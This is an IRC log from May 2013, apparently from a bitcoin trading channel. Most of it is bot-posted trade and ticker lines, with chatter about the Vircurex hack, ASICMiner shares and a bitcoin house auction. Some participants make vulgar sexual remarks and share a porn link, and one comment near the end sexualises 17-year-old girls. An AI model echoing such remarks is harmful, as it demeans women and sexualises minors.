[BTCTC] [COGNITIVE] 2 @ 0.246479 = 0.493 BTC [+] May 10 19:51:11 [BTCTC] [ASICMINER-PT] 3 @ 1.47 = 4.41 BTC [-] May 10 19:53:00 [HAVELOCK] [SDICE] 2 @ 0.305 = 0.61 BTC [+] May 10 19:55:31 !t h asicm May 10 19:55:33 [HAVELOCK:ASICM] 1D: 0.01440000 / 0.01538894 / 0.02820000 (10765 shares, 165.66189341 BTC), 7D: 0.01290000 / 0.01470188 / 0.02820000 (31529 shares, 463.53549191 BTC), 30D: 0.01290000 / 0.01470188 / 0.02820000 (31529 shares, 463.53549191 BTC) May 10 19:57:00 someone bought at .0282? May 10 20:07:37 [BTCTC] [ASICMINER-PT] 1 @ 1.4799 BTC [+] May 10 20:08:04 yeah, while i was asleep my orders sold out May 10 20:08:11 so some highj ones got eaten May 10 20:08:16 pretty crazy May 10 20:09:00 [HAVELOCK] [ASICM] 20 @ 0.01515 = 0.303 BTC [+] May 10 20:09:04 indeed May 10 20:09:17 someone got high May 10 20:11:03 2013-05-10 05:48:21 15 ฿0.02000000 ฿0.3000 May 10 20:11:04 2013-05-10 05:34:20 134 ฿0.02820000 ฿3.7788 May 10 20:11:04 2013-05-10 05:34:20 66 ฿0.02800000 ฿1.8480 May 10 20:11:04 2013-05-10 05:28:22 1 ฿0.02800000 ฿0.0280 May 10 20:11:04 2013-05-10 05:28:22 50 ฿0.02700000 ฿1.3500 May 10 20:13:43 [BTCTC] [PAJKA.BOND] 24 @ 0.10535 = 2.5284 BTC [+] May 10 20:13:49 [BTCTC] [PAJKA.BOND] 55 @ 0.10539 = 5.7965 BTC [+] May 10 20:15:28 [MPEX] [S.MPOE] 2408 @ 0.00068427 = 1.6477 BTC [-] May 10 20:16:59 [HAVELOCK] [SDICE] 9 @ 0.305 = 2.745 BTC [+] May 10 20:19:59 [HAVELOCK] [SDICE] 1 @ 0.31 BTC [+] May 10 20:21:16 [MPEX] [S.MPOE] 7592 @ 0.00069633 = 5.2865 BTC [+] May 10 20:27:04 [BTCTC] [BTC-BOND] 40 @ 0.00999 = 0.3996 BTC [-] May 10 20:27:37 [MPEX] [S.MPOE] 9000 @ 0.00069633 = 6.267 BTC [+] May 10 20:35:32 [MPEX] [S.MPOE] 6000 @ 0.00069633 = 4.178 BTC [+] May 10 20:44:02 ;;ticker May 10 20:44:03 BTCUSD ticker | Best bid: 117.78005, Best ask: 118.00000, Bid-ask spread: 0.21995, Last trade: 118.00000, 24 hour volume: 74762.01246050, 24 hour low: 111.10174, 24 hour high: 122.50000, 24 hour vwap: 117.59595 May 10 20:45:59 [HAVELOCK] [ASICM] 5 @ 0.01515 = 0.0758 BTC [+] May 10 20:46:00 [HAVELOCK] [ASICM] 70 @ 0.0152 = 1.064 BTC [+] May 10 20:46:45 [MPEX] [S.MPOE] 11052 @ 0.00069633 = 7.6958 BTC [+] May 10 20:46:47 [MPEX] [S.MPOE] 1 @ 0.00072516 BTC [+] May 10 20:46:59 [HAVELOCK] [ASICM] 5 @ 0.0152 = 0.076 BTC [+] May 10 20:48:00 [HAVELOCK] [ASICM] 14 @ 0.0152 = 0.2128 BTC [+] May 10 20:54:00 [HAVELOCK] [ASICM] 20 @ 0.0152 = 0.304 BTC [+] May 10 20:55:17 [BTCTC] [ASICMINER-PT] 1 @ 1.47 BTC [-] May 10 20:55:44 [BTCTC] [ASICMINER-PT] 1 @ 1.4675 BTC [-] May 10 20:55:54 [BTCTC] [ASICMINER-PT] 1 @ 1.4799 BTC [+] May 10 20:56:07 [BTCTC] [ASICMINER-PT] 1 @ 1.465 BTC [-] May 10 20:56:36 [BTCTC] [ASICMINER-PT] 2 @ 1.48 = 2.96 BTC [+] May 10 20:56:48 [BTCTC] [ASICMINER-PT] 1 @ 1.463 BTC [-] May 10 20:56:59 [HAVELOCK] [VTX] 1 @ 0.45 BTC [+] May 10 20:57:51 [BTCTC] [ASICMINER-PT] 1 @ 1.462601 BTC [-] May 10 20:57:57 [BTCTC] [ASICMINER-PT] 4 @ 1.4879 = 5.9516 BTC [+] May 10 20:58:28 [BTCTC] [ASICMINER-PT] 1 @ 1.4626 BTC [-] May 10 20:58:48 [BTCTC] [ASICMINER-PT] 1 @ 1.4625 BTC [-] May 10 20:59:17 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 10 21:01:16 [BTCTC] [TAT.ASICMINER] 675 @ 0.0146 = 9.855 BTC [-] May 10 21:02:17 [HAVELOCK] [ASICM] 130 @ 0.01485 = 1.9305 BTC [-] May 10 21:02:18 [HAVELOCK] [ASICM] 20 @ 0.0148 = 0.296 BTC [-] May 10 21:04:00 [HAVELOCK] [SDICE] 1 @ 0.3095 BTC [-] May 10 21:05:32 ;;ticker May 10 21:05:33 BTCUSD ticker | Best bid: 117.65000, Best ask: 117.77999, Bid-ask spread: 0.12999, Last trade: 117.65000, 24 hour volume: 74882.86447938, 24 hour low: 111.10174, 24 hour high: 122.50000, 24 hour vwap: 117.64602 May 10 21:12:59 [HAVELOCK] [VTX] 1 @ 0.45 BTC [+] May 10 21:20:59 [HAVELOCK] [ASICM] 5 @ 0.0152 = 0.076 BTC [+] May 10 21:22:03 hey whats up -assets May 10 21:22:19 default rates May 10 21:22:59 [HAVELOCK] [SDICE] 1 @ 0.3095 BTC [-] May 10 21:23:59 [HAVELOCK] [VTX] 1 @ 0.45 BTC [+] May 10 21:25:28 heheh May 10 21:26:00 [HAVELOCK] [ASICM] 23 @ 0.01525 = 0.3508 BTC [+] May 10 21:26:01 [HAVELOCK] [ASICM] 1 @ 0.01525 BTC [+] May 10 21:27:00 [HAVELOCK] [ASICM] 26 @ 0.01525 = 0.3965 BTC [+] May 10 21:30:59 [HAVELOCK] [ASICM] 10 @ 0.0153 = 0.153 BTC [+] May 10 21:33:59 [HAVELOCK] [ASICM] 11 @ 0.0153 = 0.1683 BTC [+] May 10 21:37:59 [HAVELOCK] [SDICE] 1 @ 0.3095 BTC [-] May 10 22:02:59 [HAVELOCK] [ASICM] 24 @ 0.01525 = 0.366 BTC [-] May 10 22:04:00 [HAVELOCK] [ASICM] 185 @ 0.0151 = 2.7935 BTC [-] May 10 22:04:22 [BTCTC] [COG.F] 1 @ 2.4999 BTC [+] May 10 22:04:59 [HAVELOCK] [HIM] 1 @ 2.3096 BTC [+] May 10 22:05:59 [HAVELOCK] [ASICM] 40 @ 0.015 = 0.6 BTC [-] May 10 22:06:23 vircurex hacked : https://bitcointalk.org/index.php?topic=201302.0;topicseen May 10 22:07:12 heh, i had some dust in there that i removed this morning May 10 22:07:14 phew! May 10 22:10:05 that's like...4th time? May 10 22:10:13 jurov: is it? May 10 22:10:38 wait, wasnt cryptostocks doing a ipo or something? May 10 22:10:40 yes... last time it happened, they did an IPO... and i'm sure they were hacked before May 10 22:10:53 nasty May 10 22:11:34 so cryptostocks was not even uup yet and they got prehacked May 10 22:11:43 "hacked" May 10 22:11:47 or, May 10 22:11:50 scamz May 10 22:12:10 wasnt that the guy who said his gf was getting raped? May 10 22:12:24 now his server got raped? May 10 22:12:42 https://bitcointalk.org/index.php?topic=140826.0 May 10 22:12:44 4 times? --> http://upyachka.ru/audio/benny_20121017084851.mp3 May 10 22:14:29 well, it's operating for quite some time... i remember it having much worse nondesign than even mpex May 10 22:15:11 I might be getting sites confused, cant keep all the bullshit straight that goes on May 10 22:15:59 [HAVELOCK] [ASICM] 20 @ 0.015 = 0.3 BTC [-] May 10 22:16:00 [HAVELOCK] [ASICM] 30 @ 0.015 = 0.45 BTC [-] May 10 22:16:28 the guy getting raped I was thinking about was crypto-trade May 10 22:16:37 wtf that is May 10 22:17:06 behold: http://web.archive.org/web/20120114174253/https://vircurex.com/ May 10 22:18:24 lol the crypto-trade.com site is juicy, too May 10 22:21:58 [BTCTC] [COGNITIVE] 1 @ 0.246149 BTC [-] May 10 22:21:59 and mtgox is offline May 10 22:22:00 some random btc biz link http://booyax.com/ May 10 22:22:03 [BTCTC] [COGNITIVE] 1 @ 0.24615 BTC [+] May 10 22:22:09 [BTCTC] [COGNITIVE] 2 @ 0.24638 = 0.4928 BTC [+] May 10 22:22:24 nm, just really slow May 10 22:22:36 ;;goxlag May 10 22:22:36 MtGox lag is 0.777893 seconds. During this time, light travels 0.00155888886228 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). May 10 22:25:00 [BTCTC] [COG.F] 1 @ 2.4999 BTC [+] May 10 22:29:43 kakobrekla: lol, a biz that made 0.01 coins it seems May 10 22:30:02 yeah biz was inapropriate word May 10 22:30:43 0-Confirmation payment. Have fun!! May 10 22:30:54 looks promising >:D May 10 22:32:27 MARKET CAPITALISATION 150,000 BTC May 10 22:33:36 lol May 10 22:34:33 clearly one of these fabled second wave btc enterprises May 10 22:36:51 [BTCTC] [ASICMINER-PT] 1 @ 1.47 BTC [+] May 10 22:41:39 btw, have you seen reptilia's blood-stamped btc certificates? http://hopea.fi/bitcointip/ May 10 22:42:36 wtf? May 10 22:44:07 they're to be used to tip(or annoy) the hotel staff. and there's _red ink_ emphasized, so i think maybe blood is used May 10 22:44:22 says red ink... why you think blood? May 10 22:44:40 who profits? May 10 22:44:52 course he's a nutter, so who knows... May 10 22:45:08 I dont care to do the maf, 5 mBTC is what? May 10 22:45:32 some really fucking small number May 10 22:45:58 ;;calc 0.005*[ticker --last] May 10 22:45:59 0.59 May 10 22:47:01 yup it worked... so they're prolly intended to be thrown into fountain or whatever May 10 22:50:43 ;;ticker May 10 22:50:44 BTCUSD ticker | Best bid: 118.05533, Best ask: 118.77589, Bid-ask spread: 0.72056, Last trade: 118.77589, 24 hour volume: 75345.50355025, 24 hour low: 111.10174, 24 hour high: 122.50000, 24 hour vwap: 117.79788 May 10 23:06:29 [BTCTC] [COG.F] 1 @ 2.4999 BTC [+] May 10 23:12:58 [HAVELOCK] [ASICM] 1 @ 0.01515 BTC [+] May 10 23:15:59 [HAVELOCK] [ASICM] 50 @ 0.0152 = 0.76 BTC [+] May 10 23:16:00 [HAVELOCK] [ASICM] 72 @ 0.01525 = 1.098 BTC [+] May 10 23:20:59 [HAVELOCK] [SDICE] 1 @ 0.2901 BTC [-] May 10 23:22:59 [HAVELOCK] [HIM] 2 @ 2.3109 = 4.6218 BTC [+] May 10 23:47:50 [BTCTC] [PAJKA.BOND] 2 @ 0.1079 = 0.2158 BTC [+] May 10 23:47:59 [HAVELOCK] [ASICM] 25 @ 0.0152 = 0.38 BTC [-] May 10 23:49:00 [HAVELOCK] [SDICE] 5 @ 0.30089999 = 1.5045 BTC [+] May 10 23:59:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.01465 BTC [+] May 10 23:59:05 [BTCTC] [TAT.ASICMINER] 13 @ 0.01461 = 0.1899 BTC [-] May 10 23:59:52 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199797 BTC [+] May 11 00:01:59 [HAVELOCK] [ASICM] 39 @ 0.01501 = 0.5854 BTC [-] May 11 00:01:59 [HAVELOCK] [ASICM] 11 @ 0.015 = 0.165 BTC [-] May 11 00:03:48 [BTCTC] [PAJKA.BOND] 1 @ 0.1079 BTC [+] May 11 00:05:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.01461 = 0.0292 BTC [-] May 11 00:05:59 [HAVELOCK] [ASICM] 24 @ 0.015 = 0.36 BTC [-] May 11 00:06:00 [HAVELOCK] [ASICM] 150 @ 0.01485 = 2.2275 BTC [-] May 11 00:06:02 [BTCTC] [TAT.ASICMINER] 13 @ 0.0146 = 0.1898 BTC [-] May 11 00:09:38 [MPEX] [S.DICE] 400 @ 0.00329989 = 1.32 BTC [+] May 11 00:11:52 [BTCTC] [ASICMINER-PT] 1 @ 1.4844 BTC [+] May 11 00:20:59 [HAVELOCK] [ASICM] 15 @ 0.0147 = 0.2205 BTC [-] May 11 00:29:58 [HAVELOCK] [VTX] 7 @ 0.45 = 3.15 BTC [+] May 11 00:33:39 [BTCTC] [ASICMINER-PT] 5 @ 1.4844 = 7.422 BTC [+] May 11 00:33:52 [BTCTC] [ASICMINER-PT] 1 @ 1.4845 BTC [+] May 11 00:33:56 [BTCTC] [ASICMINER-PT] 1 @ 1.485 BTC [+] May 11 00:34:12 [BTCTC] [ASICMINER-PT] 1 @ 1.486 BTC [+] May 11 00:34:28 [BTCTC] [ASICMINER-PT] 22 @ 1.488 = 32.736 BTC [+] May 11 00:34:37 [BTCTC] [ASICMINER-PT] 1 @ 1.488 BTC [+] May 11 00:35:10 [BTCTC] [ASICMINER-PT] 17 @ 1.489 = 25.313 BTC [+] May 11 00:35:16 [BTCTC] [ASICMINER-PT] 10 @ 1.4899 = 14.899 BTC [+] May 11 00:35:21 [BTCTC] [ASICMINER-PT] 7 @ 1.491 = 10.437 BTC [+] May 11 00:37:08 [BTCTC] [ASICMINER-PT] 1 @ 1.498 BTC [+] May 11 00:39:59 [HAVELOCK] [ASICM] 1 @ 0.0152 BTC [+] May 11 00:43:34 !ticker h asicm May 11 00:43:36 [HAVELOCK:ASICM] 1D: 0.01440002 / 0.01561538 / 0.02820000 (7019 shares, 109.60434524 BTC), 7D: 0.01290000 / 0.01471309 / 0.02820000 (32576 shares, 479.29358191 BTC), 30D: 0.01290000 / 0.01471309 / 0.02820000 (32576 shares, 479.29358191 BTC) May 11 00:43:56 !ticker h him May 11 00:43:58 [HAVELOCK:HIM] 1D: 2.00010000 / 2.13311429 / 2.31090000 (7 shares, 14.93180000 BTC), 7D: 1.90000100 / 2.00720846 / 2.31090000 (142 shares, 285.02360198 BTC), 30D: 0.85000000 / 1.77515951 / 2.31090000 (663 shares, 1176.93075547 BTC) May 11 00:48:44 [BTCTC] [ASICMINER-PT] 1 @ 1.498 BTC [+] May 11 00:49:30 [BTCTC] [ASICMINER-PT] 1 @ 1.498 BTC [+] May 11 00:54:55 >The Minirig will most likely ship as two units (where as it was just one before) and possibly some Singles to bring it up to the full hashrate ordered. May 11 00:54:56 lulz May 11 00:55:47 http://wholeworldinformation.blogspot.com/2013/04/first-computer-ever-made-in-world-z3.html May 11 00:55:59 new minirig May 11 01:02:59 [HAVELOCK] [SDICE] 6 @ 0.3009 = 1.8054 BTC [+] May 11 01:04:59 [HAVELOCK] [ASICM] 200 @ 0.015 = 3 BTC [-] May 11 01:07:24 [BTCTC] [ASICMINER-PT] 1 @ 1.498 BTC [+] May 11 01:08:20 [BTCTC] [B.YABMC] 100 @ 0.0165 = 1.65 BTC [-] May 11 01:08:58 [HAVELOCK] [SDICE] 2 @ 0.301 = 0.602 BTC [+] May 11 01:13:17 [BTCTC] [ASICMINER-PT] 1 @ 1.199 BTC [-] May 11 01:15:28 [BTCTC] [ASICMINER-PT] 1 @ 1.199 BTC [-] May 11 01:15:33 ? May 11 01:15:45 assbot, I think you fucked up May 11 01:17:14 its someone exercising options May 11 01:17:35 ah ha May 11 01:18:17 [BTCTC] [ASICMINER-PT] 1 @ 1.485 BTC [+] May 11 01:18:21 [BTCTC] [ASICMINER-PT] 1 @ 1.484 BTC [-] May 11 01:21:58 [HAVELOCK] [SDICE] 4 @ 0.3009 = 1.2036 BTC [-] May 11 01:26:58 [HAVELOCK] [ASICM] 24 @ 0.015 = 0.36 BTC [-] May 11 01:39:25 my spidey senses are going off again May 11 01:39:30 T'sup luke May 11 01:40:59 [BTCTC] [BITVPS] 125 @ 0.0009 = 0.1125 BTC [+] May 11 02:14:19 [BTCTC] [ASICMINER-PT] 2 @ 1.471 = 2.942 BTC [-] May 11 02:14:32 [BTCTC] [ASICMINER-PT] 1 @ 1.460001 BTC [-] May 11 02:14:36 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 11 02:14:48 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 11 02:14:52 [BTCTC] [ASICMINER-PT] 1 @ 1.45811 BTC [-] May 11 02:15:04 [BTCTC] [ASICMINER-PT] 1 @ 1.4575 BTC [-] May 11 02:15:17 [BTCTC] [ASICMINER-PT] 1 @ 1.455105 BTC [-] May 11 02:15:22 [BTCTC] [ASICMINER-PT] 1 @ 1.4551 BTC [-] May 11 02:15:26 [BTCTC] [ASICMINER-PT] 1 @ 1.455 BTC [-] May 11 02:15:46 [BTCTC] [ASICMINER-PT] 2 @ 1.45005 = 2.9001 BTC [-] May 11 02:17:57 [HAVELOCK] [ASICM] 15 @ 0.014751 = 0.2213 BTC [-] May 11 02:17:58 [HAVELOCK] [ASICM] 100 @ 0.01475 = 1.475 BTC [-] May 11 02:18:00 [HAVELOCK] [ASICM] 1 @ 0.01474 BTC [-] May 11 02:18:01 [HAVELOCK] [ASICM] 24 @ 0.01472 = 0.3533 BTC [-] May 11 02:18:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.01461 = 0.0731 BTC [+] May 11 02:18:05 [BTCTC] [TAT.ASICMINER] 12 @ 0.0146 = 0.1752 BTC [-] May 11 02:18:11 [BTCTC] [TAT.ASICMINER] 55 @ 0.01452 = 0.7986 BTC [-] May 11 02:19:11 asicminer preparing to roll over? May 11 02:20:03 w'll see May 11 02:20:16 there really hasnt been much selling off May 11 02:20:55 mostly just ribbing you May 11 02:21:10 hehe May 11 02:21:16 I'll be aight May 11 02:21:34 some of those were me May 11 02:22:09 gotta keep that price under control so i can buy more! May 11 02:22:41 don't people who try to control a market usually run out of money? May 11 02:23:54 when normal people do, yes May 11 02:24:12 sometimes individuals succeed in what is called "cornering" a market May 11 02:24:18 in -> at May 11 02:24:21 ;) May 11 02:25:55 yeah, you can corner a market, but can you make any money while doing it? May 11 02:26:36 5% mgmt fee May 11 02:26:42 not much May 11 02:26:52 but i'm not really trying to make the market yet May 11 02:26:54 yet May 11 02:26:59 mwooohahaha May 11 02:27:46 heh May 11 02:28:18 i need like 20x more shares to do that kinda thing May 11 02:32:32 don't people who try to control a market usually run out of money? << always. May 11 02:34:19 now who would try to control the market here..hmm... May 11 02:35:33 Hahha I bet gribble's mixed up in that shit too.. May 11 02:36:47 gribble's the worst. May 11 02:37:22 I'm talking to him now May 11 02:39:46 guess he doesnt like assbot very much May 11 02:40:36 hey whats up Chaang-Noi May 11 02:40:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.01486 = 0.0297 BTC [+] May 11 02:50:52 KRS1: gribble and assbot are colluding together to control the markets? they are the start of skynet? May 11 02:51:19 onoes May 11 02:51:51 i didnt even think of that.. May 11 02:52:26 of course you wouldn't think of that, they work very hard to hide their consipracy >:) May 11 02:52:30 i'll tell you one thing and i dont care if they're reading this...they're goddamn trolls May 11 02:52:45 and assbot is a spammer? May 11 02:53:04 yeah i think i saw him in the btc-e trollbox May 11 02:53:36 something stinks there..they're driving the price up man..just be ready to sell if you are in right now May 11 02:54:18 so maybe we can track their movements, anybody know which address they are on the bitfunder assets list? May 11 02:54:26 anyone got any pr0ns..im bored..maybe gonna go fap for a while..need a beer. May 11 02:54:42 maybe ill surf teh trilema for a while for some leet pix May 11 02:55:12 you know you can just http://polimedia.us/dtng/c/ and selfserve May 11 02:56:37 yeh awesome i need this shit May 11 03:05:16 http://tinyurl.com/dxgdg32 May 11 03:08:50 welp some asshole just started playing music in this cafe May 11 03:09:01 concentration fucked May 11 03:09:05 time to rent an office May 11 03:16:52 [MPEX] [S.MPOE] 1800 @ 0.000701 = 1.2618 BTC [-] May 11 03:22:32 [BTCTC] [ASICMINER-PT] 1 @ 1.491984 BTC [+] May 11 03:22:44 [BTCTC] [ASICMINER-PT] 1 @ 1.491985 BTC [+] May 11 03:22:57 [BTCTC] [ASICMINER-PT] 1 @ 1.491995 BTC [+] May 11 03:33:57 [HAVELOCK] [ASICM] 20 @ 0.01519999 = 0.304 BTC [+] May 11 03:39:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.01482 BTC [-] May 11 03:39:58 [HAVELOCK] [ASICM] 140 @ 0.01519999 = 2.128 BTC [+] May 11 03:44:45 so people talk about the pass-throughs having higher liquidity than MPEx because there is not the barrier to entry, but I think that S.MPOE sale was bigger than the volume on btct for the past month? May 11 03:49:30 ya well. May 11 03:58:30 i need a good SSD, anyone got a suggestion? May 11 03:58:38 samsung May 11 03:58:59 it's working for you? May 11 03:59:06 i have a few yea May 11 03:59:29 i have a raid ssd working on my vmware server rather well May 11 04:01:29 [MPEX] [S.MPOE] 4805 @ 0.000701 = 3.3683 BTC [-] May 11 04:04:16 [BTCTC] [ASICMINER-PT] 1 @ 1.491985 BTC [-] May 11 04:05:11 [BTCTC] [ASICMINER-PT] 1 @ 1.491995 BTC [+] May 11 04:06:29 [BTCTC] [ASICMINER-PT] 7 @ 1.492 = 10.444 BTC [+] May 11 04:06:34 [BTCTC] [ASICMINER-PT] 11 @ 1.492 = 16.412 BTC [+] May 11 04:10:07 [BTCTC] [COGNITIVE] 1 @ 0.227 BTC [-] May 11 04:10:57 [BTCTC] [TAT.ASICMINER] 47 @ 0.01482 = 0.6965 BTC [-] May 11 04:24:47 [BTCTC] [ASICMINER-PT] 1 @ 1.475 BTC [-] May 11 04:25:57 [HAVELOCK] [ASICM] 1 @ 0.015 BTC [-] May 11 04:25:58 [HAVELOCK] [ASICM] 165 @ 0.01474001 = 2.4321 BTC [-] May 11 04:26:00 [HAVELOCK] [ASICM] 84 @ 0.01474 = 1.2382 BTC [-] May 11 05:15:00 [BTCTC] [ASICMINER-PT] 1 @ 1.475 BTC [-] **** ENDING LOGGING AT Sat May 11 05:20:45 2013 **** BEGIN LOGGING AT Sat May 11 13:26:39 2013 May 11 13:28:07 ;;ticker May 11 13:28:08 BTCUSD ticker | Best bid: 115.50003, Best ask: 115.70000, Bid-ask spread: 0.19997, Last trade: 115.69000, 24 hour volume: 60390.73315900, 24 hour low: 114.00000, 24 hour high: 122.50000, 24 hour vwap: 118.55923 May 11 13:30:44 how'dy May 11 13:33:09 pretty good actually. May 11 13:36:50 [MPEX] [S.MPOE] 1233 @ 0.00070527 = 0.8696 BTC [+] May 11 13:36:52 [MPEX] [S.MPOE] 4321 @ 0.00070586 = 3.05 BTC [+] May 11 13:37:02 [MPEX] [S.MPOE] 7000 @ 0.00070587 = 4.9411 BTC [+] May 11 13:37:05 [MPEX] [S.MPOE] 3746 @ 0.00071052 = 2.6616 BTC [+] May 11 13:37:32 http://www.theonion.com/articles/teenage-girl-blossoming-into-beautiful-object,31061/ May 11 13:37:44 the onion is seriously the most respectable us news source. May 11 13:40:02 the onion can be prettygood May 11 13:40:42 of course their intent is to lampoon normal female maturation into "Something bad". as if staying a retarded 7yo is somehow the ideal and we all missed the memo. May 11 13:41:39 i s da board, btc world is the slow May 11 13:44:47 [BTCTC] [TAT.ASICMINER] 18 @ 0.0147 = 0.2646 BTC [-] May 11 13:44:57 [BTCTC] [TAT.ASICMINER] 32 @ 0.01468 = 0.4698 BTC [-] May 11 13:46:03 [HAVELOCK] [ASICM] 93 @ 0.01475001 = 1.3718 BTC [-] May 11 13:46:04 [HAVELOCK] [ASICM] 408 @ 0.01475 = 6.018 BTC [-] May 11 13:46:05 [BTCTC] [TAT.ASICMINER] 17 @ 0.01484 = 0.2523 BTC [+] May 11 13:46:45 [BTCTC] [TAT.ASICMINER] 31 @ 0.01485 = 0.4604 BTC [+] May 11 13:47:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.01488 = 0.0298 BTC [+] May 11 13:48:10 [BTCTC] [TAT.ASICMINER] 96 @ 0.01489 = 1.4294 BTC [+] May 11 13:49:21 [BTCTC] [ASICMINER-PT] 1 @ 1.493 BTC [+] May 11 13:49:33 [BTCTC] [ASICMINER-PT] 1 @ 1.495 BTC [+] May 11 13:49:50 [BTCTC] [ASICMINER-PT] 10 @ 1.4968 = 14.968 BTC [+] May 11 13:51:21 [BTCTC] [ASICMINER-PT] 1 @ 1.4969 BTC [+] May 11 13:56:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.01468 = 0.1468 BTC [-] May 11 14:18:30 kakobrekla https://bitcointalk.org/index.php?topic=196189.msg2041480#msg2041480 May 11 14:18:37 i lolled in my absent beard. May 11 14:32:17 [BTCTC] [ASICMINER-PT] 1 @ 1.495 BTC [-] May 11 14:36:07 how big btc price expectation does this asic fever show? May 11 14:36:19 did anyone do some maffs? May 11 14:36:52 but he bought asicminer, no? May 11 14:37:04 jurov maths not allowed May 11 14:37:27 i actually suspect a large section of the btc failnoobs are here because they think bitcoin being based on maffs means that it'll do all the maffing for them May 11 14:37:32 and im talking about asics May 11 14:38:25 [MPEX] [S.MPOE] 3578 @ 0.00069643 = 2.4918 BTC [-] May 11 14:38:27 [MPEX] [S.MPOE] 4321 @ 0.00068919 = 2.978 BTC [-] May 11 14:38:35 [MPEX] [S.MPOE] 651 @ 0.00068918 = 0.4487 BTC [-] May 11 14:38:38 if these failnoobs managed to put together few hundred K$ of capital, then i'd agree May 11 14:38:55 but we're seeing buch bigger asic investment than that May 11 14:40:02 what does the house has with that? May 11 14:41:10 jurov you actually saw this ? May 11 14:41:15 or did you see it reported ? May 11 14:43:04 [BTCTC] [BITVPS] 25 @ 0.00099 = 0.0248 BTC [-] May 11 14:43:06 no May 11 14:44:10 It says on their website: May 11 14:44:10 "The systems Vircurex.com and Cryptostocks.com have been taken offline over the weekend May 11 14:44:10 Please do not deposit any further coins to your Vircurex accounts. We must assume that the wallet has been compromised." May 11 14:44:20 i guess all the people buying into the ipo got owned huh. May 11 14:45:41 yes i saw that. but they claim majority of coins was in cold store, just have to rebuild server completely May 11 14:46:09 can't be too good for share price. May 11 14:47:09 yes, but...it's like 4th time with vircurex. everyone got used to it May 11 14:50:30 [BTCTC] [ASICMINER-PT] 4 @ 1.49 = 5.96 BTC [-] May 11 14:51:16 lolk May 11 14:57:11 [MPEX] [S.MPOE] 4321 @ 0.00070327 = 3.0388 BTC [+] May 11 14:57:13 [MPEX] [S.MPOE] 816 @ 0.00070342 = 0.574 BTC [+] May 11 14:59:58 truffles> Chaang isnt the bidding over 100btc for waht? May 11 15:00:07 of german house, yeah i did 50 May 11 15:01:59 that guy wont sell it i bet, he is demanding 150 btc now May 11 15:02:03 [HAVELOCK] [ASICM] 1 @ 0.01512 BTC [+] May 11 15:04:16 [BTCTC] [TAT.ASICMINER] 50 @ 0.01485 = 0.7425 BTC [+] May 11 15:06:05 [BTCTC] [ASICMINER-PT] 6 @ 1.4974 = 8.9844 BTC [+] May 11 15:08:27 kakobrekla https://bitcointalk.org/index.php?topic=198523.0 got milk ?! May 11 15:09:55 [BTCTC] [ASICMINER-PT] 1 @ 1.4974 BTC [+] May 11 15:12:07 he said no reserve May 11 15:12:21 now he is demanding 150, so i bid 50 from the 44.44444 or whatever May 11 15:13:04 [BTCTC] [S.DICE-PT] 165 @ 0.003013 = 0.4971 BTC [-] May 11 15:13:10 [BTCTC] [S.DICE-PT] 109 @ 0.003012 = 0.3283 BTC [-] May 11 15:13:24 [BTCTC] [S.DICE-PT] 50 @ 0.00301 = 0.1505 BTC [-] May 11 15:13:28 [BTCTC] [S.DICE-PT] 876 @ 0.003 = 2.628 BTC [-] May 11 15:14:01 [BTCTC] [ASICMINER-PT] 1 @ 1.49 BTC [-] May 11 15:14:29 not that i saw May 11 15:15:18 heh May 11 15:15:32 he tried that May 11 15:15:45 im okay if he does re do it as long as there is no reserve May 11 15:15:51 house is not worth 150 btc May 11 15:15:57 50 btc is about it May 11 15:18:39 lol May 11 15:19:17 its not like im going to live there (often) May 11 15:20:49 yeah, and yeah May 11 15:21:18 yeah i look damn young for my age May 11 15:21:33 lol mircea_popescu May 11 15:23:56 i think i can resell it and make money if i get it for 50 btc May 11 15:24:13 if he wont sell it to me, i can call him a scammer if he wants to be a bitch in the future May 11 15:25:33 i think he is a pot head May 11 15:25:54 i think he one of the guys that got into btc cuz silk road :/ May 11 15:26:26 he just does not seem that bright, who sells a house online in a qweek with no address or escrow? lol May 11 15:27:32 yeah, i wont wait up for it May 11 15:27:49 it wont go over 150 May 11 15:29:20 heh yes..the onion deserves some props for that article May 11 15:29:23 maybe no idea, id let it sit fora few years honestly May 11 15:29:33 got better shit to do May 11 15:29:46 needed moar illustrations though..i didnt get a good idea for just how beautiful the blossom became. May 11 15:30:45 the outside looked really nice May 11 15:31:17 the blossom article in the onion May 11 15:32:02 umms.. May 11 15:32:02 http://www.theonion.com/articles/teenage-girl-blossoming-into-beautiful-object,31061/ May 11 15:32:03 [MPEX] [S.MPOE] 4321 @ 0.00068932 = 2.9786 BTC [-] May 11 15:32:04 [MPEX] [S.MPOE] 26829 @ 0.00068918 = 18.49 BTC [-] May 11 15:32:04 there May 11 15:32:06 KRS1 good point, they did fail at that. May 11 15:32:33 17s are still taboo in the usa, theyd never show as much as they should... May 11 15:34:39 heh, friedcat sold 50 more blades overnight https://bitcointalk.org/index.php?topic=201753.0 May 11 15:34:46 50btc ea May 11 15:35:15 yeah kinda different huh May 11 15:36:06 i almost never find the Onion to be funny May 11 15:36:25 it's like Mad Magazine for adults May 11 15:37:01 50btc per blade? May 11 15:37:09 yep May 11 15:37:17 does this solve 2 blocks in its lifetime? May 11 15:37:27 not my concern May 11 15:37:31 kako they sold 50 of them in less than 2 hours and people bid for 50 more May 11 15:37:50 kako who gives a fuck if you hold AM stock eh? :) May 11 15:37:51 blah May 11 15:37:56 i dont May 11 15:38:09 why you want to buy a blad then? May 11 15:38:16 he doesnt May 11 15:38:21 just curious mostly May 11 15:38:34 maybe its just shock of the made btc the AM stock holders are getting :) May 11 15:38:46 yeah, i do wonder if its worth what people are paying May 11 15:38:58 id give 10 btc for it tops May 11 15:38:58 Chaaang-Noi you know, i've been reviewing this. 0.0007 per share per week does not go very far. May 11 15:39:04 but i have almost no hope that bfl will ship in the next 6 months their 25 ghs units or bigger May 11 15:39:10 ;;calc 0.0007 * 400000 * 4 May 11 15:39:10 1120 May 11 15:39:22 so if they pay that out in divs, we might hit .015 div this week May 11 